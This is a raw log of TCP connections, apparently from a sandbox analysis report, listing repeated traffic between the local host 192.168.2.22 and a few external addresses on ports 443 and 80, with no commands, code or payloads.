                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 45.83.105.92:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.83.105.92:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
